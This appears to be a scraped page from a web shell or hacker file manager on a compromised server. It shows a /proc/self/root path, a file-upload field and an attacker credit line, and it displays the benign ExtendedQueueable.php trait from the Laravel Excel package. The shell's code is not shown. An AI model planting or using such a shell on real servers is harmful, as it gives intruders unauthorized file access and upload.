/
proc
/
self
/
root
/
home
/
old_henza
/
server
/
vendor
/
maatwebsite
/
excel
/
src
/
Jobs
/
File Upload :
llllll
Current File: //proc/self/root/home/old_henza/server/vendor/maatwebsite/excel/src/Jobs/ExtendedQueueable.php
<?php namespace Maatwebsite\Excel\Jobs; use Illuminate\Bus\Queueable; trait ExtendedQueueable { use Queueable { chain as originalChain; } /** * @param $chain * * @return $this */ public function chain($chain) { collect($chain)->each(function ($job) { $serialized = method_exists($this, 'serializeJob') ? $this->serializeJob($job) : serialize($job); $this->chained[] = $serialized; }); return $this; } }
Copyright ©2k19 -
Hexid
|
Tex7ure